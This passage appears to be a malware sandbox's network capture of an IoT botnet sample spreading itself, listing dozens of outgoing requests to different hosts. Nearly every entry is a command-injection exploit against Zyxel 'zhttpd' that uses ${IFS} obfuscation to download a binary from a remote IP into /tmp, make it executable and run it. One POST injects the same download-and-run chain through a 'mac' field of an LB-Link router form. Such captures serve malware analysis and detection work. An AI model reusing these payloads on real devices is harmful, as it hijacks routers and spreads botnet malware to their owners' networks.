                                            Feb 2, 2024 06:21:11.610759974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4127192.168.2.154864057.148.13.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.614051104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4128192.168.2.1547142179.219.204.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.614099026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4129192.168.2.1552344202.66.9.448080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.195689917 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:12.519726992 CET638INHTTP/1.1 400 Bad Request
                                            Server: nginx
                                            Date: Fri, 02 Feb 2024 05:21:12 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            Permissions-Policy: geolocation=(),midi=(),sync-xhr=(),microphone=(),camera=(),magnetometer=(),gyroscope=(),fullscreen=(self),payment=()
                                            Referrer-Policy: strict-origin
                                            X-Frame-Options: SAMEORIGIN
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4130192.168.2.155141618.203.79.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610338926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4131192.168.2.15417621.177.233.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610419989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4132192.168.2.1532782168.99.169.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610503912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4133192.168.2.1539152103.166.141.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610553026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4134192.168.2.153391853.76.92.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610596895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4135192.168.2.155542425.205.152.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610639095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4136192.168.2.154829096.16.229.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610661983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4137192.168.2.154425664.95.177.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610675097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4138192.168.2.153909265.113.31.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610733032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4139192.168.2.154607054.101.21.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610764980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4140192.168.2.155884264.176.192.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610795021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4141192.168.2.1544932113.156.246.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610837936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4142192.168.2.1559386128.160.154.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610866070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4143192.168.2.1544276143.161.63.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610887051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4144192.168.2.153929035.135.216.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610939980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4145192.168.2.154579240.26.70.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610960960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4146192.168.2.1560916147.109.36.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.610985994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4147192.168.2.1545374108.156.112.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611013889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4148192.168.2.155590044.144.225.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611067057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4149192.168.2.155597893.99.139.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611076117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4150192.168.2.1543344155.88.36.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611116886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4151192.168.2.155594251.36.28.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611130953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4152192.168.2.1548730178.82.17.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611157894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4153192.168.2.155729631.80.126.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611190081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4154192.168.2.1550532199.237.208.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611221075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4155192.168.2.1541742122.65.108.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611254930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4156192.168.2.154741489.69.226.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611295938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4157192.168.2.153933657.242.63.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611330032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4158192.168.2.1545776131.218.48.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611345053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4159192.168.2.1534142190.138.51.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611377001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4160192.168.2.1547588160.5.27.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611426115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4161192.168.2.1559910126.104.214.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611452103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4162192.168.2.15434781.117.210.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611473083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4163192.168.2.1535076140.188.83.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611526966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4164192.168.2.1559384182.126.248.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611561060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4165192.168.2.15357148.55.176.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611605883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4166192.168.2.1550572210.91.149.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611637115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4167192.168.2.1539802185.194.143.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611670017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4168192.168.2.1557906220.45.35.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611723900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4169192.168.2.1557390123.79.58.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611785889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4170192.168.2.1542478169.25.235.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611804962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4171192.168.2.1544558170.196.250.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611861944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4172192.168.2.1552704165.2.153.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611884117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4173192.168.2.1552318209.132.11.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611933947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4174192.168.2.155035276.139.5.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.611954927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4175192.168.2.1554284155.207.251.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612013102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4176192.168.2.1554584102.134.135.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612040997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4177192.168.2.1554912204.158.164.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612078905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4178192.168.2.153613453.119.47.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612135887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4179192.168.2.1536192126.77.90.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612153053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4180192.168.2.154331869.142.132.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612168074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4181192.168.2.1533342203.124.254.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612224102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4182192.168.2.155682085.203.125.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612266064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4183192.168.2.15435242.108.195.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612303972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4184192.168.2.1534350102.21.0.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612330914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4185192.168.2.154592032.250.21.18443
                                            TimestampBytes transferredDirectionData
